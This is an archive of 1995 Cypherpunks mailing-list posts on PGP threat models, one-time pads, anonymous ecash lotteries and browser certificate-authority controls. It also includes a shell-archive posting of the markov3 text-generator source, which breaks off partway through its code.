From anonymous-remailer at shell.portal.com  Wed Nov 29 19:01:06 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 30 Nov 1995 11:01:06 +0800
Subject: key for Alice as promised (not)
Message-ID: <199511300232.SAA22068@jobe.shell.portal.com>


On Wed, 29 Nov 1995, Adam Shostack wrote:

> > PGP is really not the issue.  The issue is more my security and the
> > environment that I use PGP in.  I don't have a trusted machine to run PGP
> > on.  Anyone who wants to can come up to machine and copy my secret keyring
> > or they can even watch me typing my password in. 
> 
> 	Threat, please??  Do people often stand over your shoulder as
> you type?

Yes.

>  Enter your office, 

Yep, especially my night cleaning staff.

> point guns at you, 

Not recently ... I'd co-operate fully in that situation, though.

> and take a backup of your entire computer?  

You mean like the on-site backups that I have in the filing cabinet 
beside me, or the off-site backups that aren't here (in case of fire, or 
such) nd are completely outside my control?

> Have you considered putting the secret keyring
> on a floppy and locking it in your desk/safe when you're not actually
> in the office? (Or home..)

Yep, I've considerred it.  It's still not all that helpful.  Cleaning 
staff has plenty of time when I'm not around to deal with that.

> > So, I don't fool myself, and I don't use PGP, except for things like
> > exchanging a one-time pad with someone when I've already sent the message
> > out across another delivery mechanism, like on a floppy delivered my
> > courier. 
> 
> 	I don't follow.  You're claiming that PGP is good enough to
> transfer OTPads, but not good enough to sign pseudononymous messages?

Sure. Two different situations.

If I take a message or a data tape and encrypt it with a one time pad.  

And then I send the message out to someone via Greyhound or DHL.

And once they've confirmed that they have the encrypted message safely in 
hand, then I'll call them and ask them to call me with their public key
delivered by voice via telephone.

Which I then use to encrypt the one-time-pad, using the PGP key only once.

Then, I'm comfortable sending it (not the message, but the pad) over the 
Internet encrypted with PGP.  And I think at that point, I have Pretty 
Good Privacy.

> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From adam at lighthouse.homeport.org  Wed Nov 29 19:55:38 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Thu, 30 Nov 1995 11:55:38 +0800
Subject: key for Alice as promised (not) (fwd)
Message-ID: <199511300318.WAA16662@homeport.org>


>On Wed, 29 Nov 1995, Adam Shostack wrote:
>
>> > PGP is really not the issue.  The issue is more my security and the
>> > environment that I use PGP in.  I don't have a trusted machine to run PGP
>> 	Threat, please??  Do people often stand over your shoulder as
>> you type?
>
>Yes.

And you can't ask them to leave, as you send anonymous messages?  Or
does your whole office know your one of those who post to cypherpunks
as Alice d' nonymouys?

>> Have you considered putting the secret keyring
>> on a floppy and locking it in your desk/safe when you're not actually
>> in the office? (Or home..)
>
>Yep, I've considerred it.  It's still not all that helpful.  Cleaning 
>staff has plenty of time when I'm not around to deal with that.

	Of course, if the cleaning staff cut your safe open, you have
a good indication of that in the morning.

	Not that you've demonstrated that the level of effort to do
all of this at all equates to what is gained, namely, the ability to
impersonate you.  Which everyone in the world has today.

>> > So, I don't fool myself, and I don't use PGP, except for things like
>> > exchanging a one-time pad with someone when I've already sent the message
>> > out across another delivery mechanism, like on a floppy delivered my
>> > courier. 
>> 
>> 	I don't follow.  You're claiming that PGP is good enough to
>> transfer OTPads, but not good enough to sign pseudononymous messages?
>
>Sure. Two different situations.

[...]

>And once they've confirmed that they have the encrypted message safely in 
>hand, then I'll call them and ask them to call me with their public key
>delivered by voice via telephone.

>Which I then use to encrypt the one-time-pad, using the PGP key only once.
>
>Then, I'm comfortable sending it (not the message, but the pad) over the 
>Internet encrypted with PGP.  And I think at that point, I have Pretty 
>Good Privacy.

	Of course, then your message only has 128 bits of security,
because the Greyhound or DHL employee could be easily comprimised, as
could the message in their office.  So you encrypt the pad with IDEA,
getting you IDEA level security, and think you're working with one
time pads??

	I'm flabbergasted.






From tcmay at got.net  Wed Nov 29 20:01:20 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 12:01:20 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <ace2609d04021004758e@[205.199.118.202]>


At 1:20 AM 11/30/95, Ian Goldberg wrote:

>[Disclaimer: The following post is a gedanken experiment.  It should not
>                be interpreted as condoning or encouraging anyone to break any
>                laws, no matter how stupid the laws are.]

I, on the other hand, have no compunctions about "condoning or encouraging"
various kinds of actions. When condoning and encouraging becomes criminal,
I hope I'll be gone. (Wiseacres will cite hypos in which encouraging a
crime, such as a rape, makes the encouragers culpable. A far cry from
condoning and encouraging tax evasion, gambling, etc.)

On to Ian's proposal:

...
>Now: there's likely no Web-of-Trust to the various PGP keys involved,
>so the lottery's Reputation will have to be built up.  A good way to
>do this is to have smaller prizes being won fairly often (e.g. by matching
>the last digit/few bits), so that it's obvious the lottery is not just
>collecting money without awarding prizes.

Have to be _very_ careful here. A variety of scams can be developed which
show lots of "small" winners, but which fail to show any large winners. The
lottery operators can make a lot of extra bucks by simply not paying off
the large winnings, in various ways.

More robust protocols may be possible. In particular, I recall that Eric
Hughes was working on something he called "encrypted open books." While
banking was the obvious domain, it seems plausible that the same
methodologies could be adapted for lotteries (some isomorphisms between
accounts/balances and tickets/winnings?).

I don't follow Ian's proposal in enough detail to comment on it, but
thought I should point out the scams over nonpayment of winnings and the
"encrypted open books" notions (from sometime in '93, as I recall).

Personally, I have long had great _hopes_ for using crypto for
non-sanctioned gambling, but I'm pretty skeptical that many people will do
it. For one thing, anyone knowledgeable enough to be comfortable with the
crytography knows that gambling when a house cut exists is a lose. (And
gambling with no house cut is, at best, a wash.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From pete at loshin.com  Wed Nov 29 20:04:30 1995
From: pete at loshin.com (Pete Loshin)
Date: Thu, 30 Nov 1995 12:04:30 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <01BABEA9.4771C9E0@ploshin.tiac.net>


Ian Goldberg wrote: 
>
>Here's an off-the-cuff idea:
>
>[Disclaimer: The following post is a gedanken experiment.  It should not
>		be interpreted as condoning or encouraging anyone to break any
>		laws, no matter how stupid the laws are.]
>
>Anonymous email lotteries:
[details deleted]
>A lottery consists simply of displaying the winning number and random
>noise, whose hash was previously posted (so the participants know
>you're not cheating).

Traditional illegal numbers rackets usually use some
publicly available number so everyone knows it's all
on the up and up (I used to know what the source for
the winning numbers actually _is_, though I think it
has something to do with the stock market, e.g., the
last three digits of the number of oddlot trades, or
something else that is usually essentially random.

In any case, using such a "public" and daily number
eliminates the problem of proving the game isn't fixed.

-Pete Loshin
 pete at loshin.com






From jsw at netscape.com  Wed Nov 29 20:25:53 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Thu, 30 Nov 1995 12:25:53 +0800
Subject: Certificate Authorities?
In-Reply-To: <01BABCAF.9CDAE5C0@csasaki>
Message-ID: <30BBB178.267A@netscape.com>


We are looking at adding the ability for enterprise security
administrators to lock various parts of the Navigator configuration
so that the user can not change them, including stuff relating
to trust and certificates.  This functionality will not be in
2.0, but we do consider it important for certain customers.

	--Jeff

P. Rajaram wrote:
> Yes.  But...
> I deal with the security infrastructure for a large corporation.
> I want only security administrators to configure the list of acceptable CAs.
> I specifically do not want our users to be able to add new CAs
> to the list of trusted "approved" CAs.
> 
> The concern is that some users who are not crypto enthusiasts may be
> "social engineered" into adding a very liberal CA to their list.
> Once this happens, the browser's signature verification capability
> is totally compromised.
> 
> This is one of the reasons why PGP has not been adopted by many large
> companies.  In response, Viacrypt now seems to have a product that
> can restrict user modifications to the public keyring.
> 
> -raj

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From tcmay at got.net  Wed Nov 29 20:30:53 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 12:30:53 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <ace26afe05021004e5e0@[205.199.118.202]>


At 2:00 AM 11/30/95, Dr. Dimitri Vulis wrote:
>iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) writes:
>> So; is there a problem with the implementation outlined above?
>
>What about the income tax on winnings?

That's a good one! A bit subtle as humor, though.

(For many of us, even most of us, the whole _attraction_ of such gambling
schemes--to the extent any gambling scheme can ever be attractive to a
rational person--is the tax avoidance. And any scheme that allows taxation
of winnings, but not losses on individual bets, would kill this proposal
dead.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Wed Nov 29 20:42:13 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 12:42:13 +0800
Subject: Fertile ground for papers....
Message-ID: <ace26c630602100439cf@[205.199.118.202]>


At 3:22 AM 11/30/95, Pete Loshin wrote:

>In any case, using such a "public" and daily number
>eliminates the problem of proving the game isn't fixed.

Maybe.

In passing, the whole field of cryptography is filled with interesting
papers with titles like "How to toss a fair coin over the telephone" and
"Avoiding double spenders in digital money systems."

Meaning, how robust cryptographic protocols can be used to avoid scams
familiar to the most junior grifter.

The theme of "proving anonymous betting schemes are not fixed" is in the
same vein, and could establish the reputation of any budding Amos Fiats or
David Chaums out there.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From hroller at c2.org  Wed Nov 29 21:17:05 1995
From: hroller at c2.org (Hroller Anonymous Remailer)
Date: Thu, 30 Nov 1995 13:17:05 +0800
Subject: Your faith is PGP is charming and quaint, but wrong
Message-ID: <199511300446.UAA19851@infinity.c2.org>



All of these articles from people claiming to be me!

I repeat, for the slow learners, that I consider PGP to be untrustworthy, at least on my machines. I don't want those Mounties to do to me what they did to Mulroney en passant. 

You in the southern colony are free to use PGP, but I prefer other means of establishing my uniqueness. Style, for example, cannot be easily copied.

I am, as always, 


  Alice de 'nonymous ...
  
                                    ...just another one of those...
  
  
  P.S.  This post is in the public domain.

                    I.  A.  M.  A.  M.  O.  R.  O.  N.







From mjsus at atlanta.com  Wed Nov 29 21:25:48 1995
From: mjsus at atlanta.com (mjsus at atlanta.com)
Date: Thu, 30 Nov 1995 13:25:48 +0800
Subject: GOST for sale
Message-ID: <199511300458.XAA08306@atlanta.com>


>>
>	I have non-commercial demo version of the product (370 Kb arjed 
>	distributive) and I can send it to people who will be interested in it.
>

Please, send it to me. Thanks. Mark







From rsalz at osf.org  Wed Nov 29 21:32:02 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 30 Nov 1995 13:32:02 +0800
Subject: Your faith is PGP is charming and quaint, but wrong
Message-ID: <9511300504.AA18396@sulphur.osf.org>


>Style, for example, cannot be easily copied.

Au contrair.

Cypherpunks share code...

#! /bin/sh
# This is a shell archive.  Remove anything before this line, then feed it
# into a shell via "sh file" or similar.  To overwrite existing files,
# type "sh file -c".
# The tool that generated this appeared in the comp.sources.unix newsgroup;
# send mail to comp-sources-unix at uunet.uu.net if you want that tool.
# Contents:  Makefile PATCHLEVEL README markov3.6 markov3.l
# Wrapped by rsalz at sulphur on Thu Nov 30 00:04:29 1995
PATH=/bin:/usr/bin:/usr/ucb ; export PATH
echo If this archive is complete, you will see the following message:
echo '          "shar: End of archive."'
if test -f 'Makefile' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'Makefile'\"
else
  echo shar: Extracting \"'Makefile'\" \(53 characters\)
  sed "s/^X//" >'Makefile' <<'END_OF_FILE'
X
Xmarkov3: markov3.o
X	$(CC) -o $@ $(CFLAGS) markov3.o
END_OF_FILE
  if test 53 -ne `wc -c <'Makefile'`; then
    echo shar: \"'Makefile'\" unpacked with wrong size!
  fi
  # end of 'Makefile'
fi
if test -f 'PATCHLEVEL' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'PATCHLEVEL'\"
else
  echo shar: Extracting \"'PATCHLEVEL'\" \(2 characters\)
  sed "s/^X//" >'PATCHLEVEL' <<'END_OF_FILE'
X1
END_OF_FILE
  if test 2 -ne `wc -c <'PATCHLEVEL'`; then
    echo shar: \"'PATCHLEVEL'\" unpacked with wrong size!
  fi
  # end of 'PATCHLEVEL'
fi
if test -f 'README' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'README'\"
else
  echo shar: Extracting \"'README'\" \(2400 characters\)
  sed "s/^X//" >'README' <<'END_OF_FILE'
XThis is a cleaned-up reposting of the markov3 program.  The following
Xchanges have been made:
X
XThe null pointer dereferencing bugs have been fixed (I hope).
X
XThe code that uses "rand" should now be portable (the patches posted
Xto the net to fix this problem were wrong, they break the code on
Xsome machines in order to fix it on others.  I stole some code from
X"hack" to do things right.  If hack works for you, this should).
X
Xmarkov3 now understands "notes" cruft (thanks to Rich Salz).
X
XBecause of the 50% rule in news 2.11, people often use some other
Xcharacter than ">" for inclusions.  markov3 assumes that lines
Xbeginning with any of 
X
X	> < ) | # } ]
X
Xare inclusions (without this rule, funny-looking output results if
Xanyone uses non-standard "quoting").
X
XThe random number generator is initialized using the time, if neither
Xthe -s flag nor the new -x flag is given.
X
XThis will be the last complete posting; a "patchlevel" file is included
Xand I will send out patches if there are further bugs or improvements.
X
XHere's the original README.
X---------------------------------------------------------------------------
XI created a bit of a stir with this program in December 1986 when I
Xused an earlier version of it to simulate a certain well-known net
Xpersonality (Hi Laura!).  It digests Usenet articles and spits out
Xother articles with similar characteristics.  You need lex to run it,
Xbut otherwise it should run on any Unix I know of.  
X
XI had several requests for the program but didn't consider it
X"ready".  It's as ready as it will ever be now.
X
XThe program uses getopt(3).  There are several public-domain versions
Xavailable for Berkeley systems from the mod.sources archives.  Since
Xit's small, I've included Henry Spencer's version, but you'll have
Xto change the Makefile to use it.
X
XFor best results, feed it at least ten articles by the same person
Xor on the same subject.  If there are fewer articles the output
Xresembles the original too much; if there is too much variety in
Xthe articles the output is more incoherent than it otherwise is.
X
XThe program requires lots of memory if it is given lots of input;
Xthe small-model people will have problems.
X
XPlease don't post the output to the net (though I'd be happy to
Xsee some of the more interesting results).
X
XSend comments, suggestions for improvement, fan mail, and flames
Xto me: {sun,hplabs,ames,ihnp4}!oliveb!epimass!jbuck.
END_OF_FILE
  if test 2400 -ne `wc -c <'README'`; then
    echo shar: \"'README'\" unpacked with wrong size!
  fi
  # end of 'README'
fi
if test -f 'markov3.6' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'markov3.6'\"
else
  echo shar: Extracting \"'markov3.6'\" \(2503 characters\)
  sed "s/^X//" >'markov3.6' <<'END_OF_FILE'
X.\" markov3
X.\" @(#)markov3.6	1.1 3/6/87 epimass!jbuck
X.TH MARKOV3 6 "3/6/87"
X.UC 4
X.SH NAME
Xmarkov3 \- Digest and spit out quasi-random Usenet articles
X.SH SYNOPSIS
X.B markov3
X[
X.B \-pv
X] [
X.B \-n
X.I n_articles
X] [
X.B \-d
X.I dumpfile
X] [
X.B \-s
X.I seed
X] [
X.B \-x
X]
Xfiles
X.SH DESCRIPTION
X.PP
X.I Markov3
Xdigests Usenet articles and builds an internal data structure that
Xmodels the articles as if they came from a random process, where
Xeach word is determined by the previous two.  It then emits a series
Xof articles on the standard output that have the same distribution
Xof words, word pairs, and word triplets as do the input files.
XThe name
X.I markov3
Xcomes from the fact that this structure is called a Markov chain,
Xand that the statistics for word triplets are modeled.
XHere, a "word" is a sequence of printable characters surrounded by
Xwhitespace.  Paragraph breaks (blank lines) are also treated as a
X"word".  Paragraphs of included text are treated as single "words"
Xand printed as "> ...".
X.PP
XBy default, the program expects to be fed Usenet articles; it strips
Xoff headers, included text, and signatures (or at least it tries).
XThe
X.B \-p
X(plain) option disables the header-stripping feature (otherwise
Xeverything is skipped until a blank line is encountered).
X.PP
XBy default, 10 articles, separated by form feeds, are written on the
Xstandard output.  The
X.B \-n
Xoption lets you specify a different number.
X.PP
XThe
X.B \-x
Xoption does not seed the random number generator; this is useful
Xfor simulating people who repeat themselves.
X.PP
XThe
X.B \-d
X(dump) option dumps a representation of the internal data structure
Xbuilt by
X.I markov3
Xon the named file.
X.PP
XFinally, the
X.B \-v
X(verbose)
Xoption prints some statistics on the standard error.
X.SH "CAVEATS"
XThis program allocates lots of memory if given large amounts of input.
XOn virtual memory systems, the paging behavior is atrocious because
Xpointers tend to point every which way, and many pointers are dereferenced
Xfor every word processed.  This could be improved, I'm sure.
X.PP
XPosting articles generated by
X.I markov3
Xto the net may be hazardous to your health.
X.PP
XNot as smart as Mark V. Shaney.
X.SH "PORTABILITY"
XAn effort has been made to make this program as portable as possible;
Xan earlier version was much less portable because of problems with
Xnull pointers and rand(3).  Please let me know if you have further problems.
X.PP
XIf you don't have lex, you'll need to rewrite the lexical analyzer
Xbut most of the program is in C.
END_OF_FILE
  if test 2503 -ne `wc -c <'markov3.6'`; then
    echo shar: \"'markov3.6'\" unpacked with wrong size!
  fi
  # end of 'markov3.6'
fi
if test -f 'markov3.l' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'markov3.l'\"
else
  echo shar: Extracting \"'markov3.l'\" \(11822 characters\)
  sed "s/^X//" >'markov3.l' <<'END_OF_FILE'
X%{
X/*
X * Copyright (c) 1986, 1987 by Joe Buck
X *
X * Permission is granted to use, redistribute, or modify this program,
X * as long as you don't pretend you wrote it.  Send improvements or
X * bug reports to {ihnp4,hplabs,ames,sun}!oliveb!epimass!jbuck.
X *
X * The program generates simulated Usenet articles, given Usenet articles
X * as input.
X *
X * This program constructs a table of frequencies for a token appearing,
X * given the two preceding tokens.  A "token" is a sequence of non-blank
X * characters.  An entirely blank line is also treated as a token, as is
X * the beginning and end of an article.
X *
X * The program is designed to process news articles, rejecting text from
X * the header, signature, and included text, together with cruft inserted
X * by rn and notes.  A paragraph of included text is treated like a token.
X *
X * After the table is built (and it can be big), articles are generated
X * on the standard output.
X */
X#ifndef lint
Xstatic char *sccs_id = "@(#)markov3.l	1.1 3/6/87 epimass!jbuck";
X#endif
X#include <sys/types.h>		/* for time_t */
Xint in_included_text = 0;
X#ifdef yywrap
X#undef yywrap
X#endif
X%}
X%Start HDR BODY SIG
X%%
X<HDR>^[^ \t]+:.*\n	;	/* Header line, e.g. "From: foo at bar.UUCP" */
X<HDR>^[ \t]+[^ \t].*\n	;	/* Continuation of header line */
X<HDR>^[ \t]*$		BEGIN BODY;
X<BODY>^"-- "$		BEGIN SIG;
X<BODY>^[><)|#}].*\n	{ /* 50% rule gets people to change ">"
X			     to other characters; this gets most of them */
X			  if (!in_included_text) {
X    			      in_included_text = 1;
X			      process_token ("\n> ...\n\n");
X			  }
X			}
X<BODY>"]".*\n		{ /* should have been included in the above.  My
X			     lex generates bad C code if I say [[><...]
X			     even though ed(1) says that's a valid regular
X			     expression. */
X			  if (!in_included_text) {
X			      in_included_text = 1;
X			      process_token ("\n> ...\n\n");
X			  }
X			}
X<BODY>^"In article".*\n	;	/* Reject rn crud */
X<BODY>^"/* Written".*"*/"\n	;		/* Also NOTES crud */
X<BODY>^"/* End of text from".*"*/"\n	;		/* NOTES */
X<BODY>^"/* ----------".*"----------*/"\n	;		/* NOTES */
X<BODY>[ \t]+		;	/* Skip white space */
X<BODY>\n[ \t\n]*\n	{ process_token ("\n"); /* Paragraph break */}
X<BODY>^\..*		;	/* Ignore format directives. */
X<BODY>[^ \t\n]+		{ in_included_text = 0; process_token (yytext); }
X<HDR>.			;	/* Eat anything that escaped */
X<HDR>\n			;
X<BODY>\n		;
X<SIG>.			;
X<SIG>\n			;
X%%
Xextern int optind;
Xextern char *optarg;
X
X/*
X * hashtab is a hash table storing all the tokens we encounter.
X */
Xstruct htentry {
X    char *htext;
X    struct htentry *hlink;
X};
X
X#define HSIZE 3557		/* Should be prime */
X#define Fprintf (void)fprintf
X#define Printf (void)printf
X
Xstruct htentry hashtab[HSIZE];
X
X/*
X * node and succnode are portions of the big structure we're going to build.
X * node represents something like ("was", "a") in a binary tree.
X * a linked list of succnodes contain tokens that may follow ("was", "a")
X */
Xstruct node {
X    char *text;
X    char *text2;
X    int ocount;
X    struct node *lc, *rc;
X    struct succnode *succ;
X};
X
Xstruct succnode {
X    struct node *scnod;
X    int    count;
X    struct succnode *link;
X};
X
X
Xstruct node *prev_code = NULL;
Xchar *prev_token = NULL, **Argv;
Xint init_state = HDR;
Xint verbose = 0;
Xstruct node *root = NULL, *tknptr;
Xstruct succnode *start = NULL;
Xint n_pairs = 0, n_tokens = 0, n_files = 0, n_total = 0;
X
Xstruct node *insert_token();
Xchar *savetoken();
X
Xprocess_token (txt)
Xchar *txt;
X{
X     struct node *code;
X     char *token = savetoken (txt);
X/* We have a new token.  Say the previous two tokens were "one" "way"
X * and the current token is "to".  Then prev_code points to a node
X * for ("one", "way") and token is "to".  This function adds ("way", "to") as a
X * successor to ("one","way") and makes prev_code point to ("way","to").
X */
X     code = insert_token (prev_token, token);
X     insert_pair (prev_code, code);
X     prev_code = code;
X     prev_token = token;
X     return;
X}
X
X/*
X * here it is, the main function.
X */
Xmain (argc, argv)
Xint argc;
Xchar  **argv;
X{
X    int     i, c, n_articles = 10, sflag = 0;
X    char *dumpfile = NULL;
X    extern int  optind;
X    extern char *optarg;
X
X    while ((c = getopt (argc, argv, "pxvn:d:s:")) != EOF) {
X	switch (c) {
X	    case 'v':
X		verbose = 1;
X		break;
X	    case 'p':		/* Input is plain text, not Usenet stuff */
X		init_state = BODY;
X		break;
X	    case 'n': 		/* # articles to generate */
X		n_articles = atoi (optarg);
X		break;
X	    case 'd':		/* where to dump the data structure */
X		dumpfile = optarg;
X		break;
X	    case 's':		/* Set the seed for rand; fall through */
X		srand (atoi (optarg));
X	    case 'x':		/* set flag to prevent srand */
X		sflag++;
X		break;
X	    default:
X		Fprintf (stderr,
X		 "Usage: markov3 [-pvx] [-s seed] [-n n_art] [-d dump] files\n");
X		exit (1);
X	}
X    }
X    BEGIN init_state;		/* initial state of lexical analyzer */
X    if (!sflag)			/* set random number generator */
X	srand ((int)time ((time_t *)0));
X/* Note: if optind == argc, there are no file arguments.  yyin is left
X * initialized to stdin.
X */
X    if (optind < argc) {
X/* yyin is lex input stream.  Point to first file. */
X	if ((yyin = fopen (argv[optind], "r")) == NULL) {
X	    perror (argv[optind]);
X	    exit (1);
X	}
X	optind++;		/* skip to next file */
X    }
X    Argv = argv;		/* make it global so yywrap can access it */
X    n_files = 1;
X/* yylex puts all the input files through the lexical analyzer and builds
X * the database.
X */
X    (void) yylex ();
X    if (dumpfile)
X	dump_database (dumpfile);
X    if (verbose)
X	Fprintf (stderr,
X	 "Total of %d tokens (%d different), %d different pairs, %d files\n",
X		n_total, n_tokens, n_pairs, n_files);
X/* Generate the articles, separated by form feeds */
X    for (i = 0; i < n_articles; i++) {
X	if (i > 0) output_word ("\n\f\n");
X	generate_article ();
X    }
X    return 0;
X}
X
X/*
X * Lex calls this when EOF is reached.  It opens the next file if there
X * is one.  Lex interprets a return value of 1 to mean "all done" and 0
X * to mean "keep going".
X */
Xyywrap () {
X    (void) fclose (yyin);
X    insert_pair (prev_code, (struct node *)0);
X    prev_code = NULL;
X    if (Argv[optind] == NULL) return 1;
X    else if ((yyin = fopen (Argv[optind], "r")) == NULL) {
X	perror (Argv[optind]);
X	exit (1);
X    }
X    optind++;
X    in_included_text = 0;
X    if (verbose && n_files % 10 == 0)
X	Fprintf (stderr, "%d files\n", n_files);
X    n_files++;
X    BEGIN init_state;
X    return 0;
X}
X
X/*
X * This function saves a token in the hash table (if it isn't there
X * already) and returns a pointer to the stored copy.
X */
Xchar *
Xsavetoken (txt)
Xchar *txt;
X{
X    int h;
X    char *p;
X    struct htentry *hp;
X
X    n_total++;
X    for (p = txt, h = 0; *p; h += *p++);
X    hp = hashtab + (h % HSIZE);
X    while (hp->hlink) {
X	if (strcmp (hp->htext, txt) == 0) {
X	    return hp->htext;
X	}
X	hp = hp->hlink;
X    }
X/* OK, it's a new token.  Make hp->hlink point to a new,
X * null block and make hp->htext point to the text.
X */
X    hp->hlink = (struct htentry *) malloc (sizeof *hp);
X    hp->htext = malloc ((unsigned)(strlen (txt) + 1));
X    (void) strcpy (hp->htext, txt);
X    hp->hlink->hlink = NULL;
X    hp->hlink->htext = NULL;
X    n_tokens++;
X    return hp->htext;
X}
X
X/*
X * This recursive function inserts a token pair into the tree.
X */
Xstruct node *
Xinsert_in_tree (p, txt, txt2)
Xstruct node *p;
Xchar *txt, *txt2;
X{
X    int cmp;
X    if (p == NULL) {
X/* Create a new node. */
X	p = (struct node *) malloc (sizeof *p);
X	p->text = txt;
X	p->text2 = txt2;
X	p->lc = p->rc = NULL;
X	p->succ = NULL;
X	p->ocount = 1;
X	tknptr = p;
X	n_pairs++;
X	if (verbose && n_pairs % 1000 == 0)
X	    Fprintf (stderr, "%d pairs\n", n_pairs);
X	return p;
X    }
X    cmp = my_strcmp (p->text, txt);
X    if (cmp == 0) cmp = my_strcmp (p->text2, txt2);
X    if (cmp == 0) {
X/* It's a match.  Increment the count. */
X        tknptr = p;
X	p->ocount += 1;
X    }
X/* Look in the subtrees. */
X    else if (cmp < 0) p->lc = insert_in_tree (p->lc, txt, txt2);
X    else p->rc = insert_in_tree (p->rc, txt, txt2);
X    return p;
X}
X
X/*
X * This just calls insert_in_tree starting at the root
X */
Xstruct node *
Xinsert_token (txt, txt2)
Xchar *txt,*txt2;
X{
X    root = insert_in_tree (root, txt, txt2);
X    return tknptr;
X}
X
X/*
X * This function adds a successor.
X */
Xstruct succnode *
Xinsert_in_succ_chain (sp, np)
Xstruct succnode *sp;
Xstruct node *np;
X{
X    if (sp == NULL) {
X	sp = (struct succnode *) malloc (sizeof *sp);
X	sp->scnod = np;
X	sp->count = 1;
X	sp->link = NULL;
X    }
X    else if (sp->scnod == np)
X	sp->count += 1;
X    else sp->link = insert_in_succ_chain (sp->link, np);
X    return sp;
X}
X
X/*
X * This calls insert_in_succ_chain starting at the right place.
X */
Xinsert_pair (p1, p2)
Xstruct node *p1, *p2;
X{
X    if (p1) p1->succ = insert_in_succ_chain (p1->succ, p2);
X    else start = insert_in_succ_chain (start, p2);
X}
X
X/*
X * This function dumps the stored data structure onto a file.
X * Now if only I had a function to read it back in.
X */
Xchar *
Xpr_token (txt)
Xchar *txt;
X{
X    if (txt[0] != '\n')
X	return txt;
X    return txt[1] ? "<INCL>" : "<LF>";
X}
X
Xtreedump (tree, fp)
Xstruct node *tree;
XFILE *fp;
X{
X    if (tree) {
X	treedump (tree->rc, fp);
X	Fprintf (fp, "( %s %s ) %d", pr_token (tree->text),
X			pr_token (tree->text2), tree->ocount);
X	chaindump (tree->succ, fp);
X	treedump (tree->lc, fp);
X    }
X}
X
X/*
X * Subroutine of treedump; it does one row.
X */
Xchaindump (p, fp)
Xstruct succnode *p;
XFILE *fp;
X{
X    char   *text;
X    while (p) {
X	if (p->scnod == NULL)
X	    text = "<EOF>";
X	else text = pr_token (p->scnod->text2);
X	Fprintf (fp, " %s %d", text, p->count);
X	p = p->link;
X    }
X    putc ('\n', fp);
X}
X
X/*
X * This routine generates the dump file (-d option)
X */
Xdump_database (file)
Xchar *file;
X{
X    FILE *fp = fopen (file, "w");
X    if (fp == NULL) {
X	Fprintf (stderr, "markov: can't open ");
X	perror (file);
X	exit (1);
X    }
X    Fprintf (fp, "START:");
X    chaindump (start, fp);
X    treedump (root, fp);
X}
X
X/* roll (n) generates a uniformly distributed rv between 0 and n-1.
X * This code is stolen from "hack" and should be portable.  If you
X * change this, remember that different systems have rand functions
X * with different ranges, and the bottom bits are often no good.
X */
X#define roll(n) ((rand() >> 3) % n)
X
X/*
X * This function generates an article by traversing the
X * structure we've built.
X */
Xgenerate_article () {
X    struct succnode *p = start;
X    int ncounts = n_files;
X    int n, accum;
X    char *tp;
X
X    while (1) {
X/* Roll the dice to find out the next token.  The code below selects the
X * next token, and the new state, with a probability corresponding to the
X * frequency in the input.
X */
X	n = roll (ncounts);
X	accum = p->count;
X	while (accum <= n && p->link) {
X	    p = p->link;
X	    accum += p->count;
X	}
X	if (p->scnod == NULL)
X	    break;
X	tp = p->scnod->text2;
X/* Check for "end of story" */
X	if (tp == NULL)
X	    break;
X	output_word (tp);
X	ncounts = p->scnod->ocount;
X	p = p->scnod->succ;
X    }
X    output_word ("\n");	/* This will flush the buffer as well. */
X    return;
X}
X
X/*
X * This version handles null strings *
X */
Xmy_strcmp (a, b)
Xregister char *a, *b;
X{
X    if (a == NULL) return b ? -1 : 0;
X    if (b == NULL) return 1;
X    return strcmp (a, b);
X}
X
X#define LEN 75
Xoutput_word (word)
Xchar *word;
X{
X    static char line[LEN+1];
X    static int room = LEN;
X    int l;
X
X    if (word == NULL) return;
X    l = strlen (word);
X/* If word won't fit, or starts with \n, dump the current line */
X    if ((l >= room || word[0] == '\n') && line[0]) {
X	Printf ("%s\n", line);
X	line[0] = 0;
X	room = LEN;
X    }
X/* If word won't fit in the buffer or starts with \n, print it now */
X    if (l >= LEN)
X	Printf ("%s\n", word);
X    else if (word[0] == '\n')
X	Printf ("%s", word);
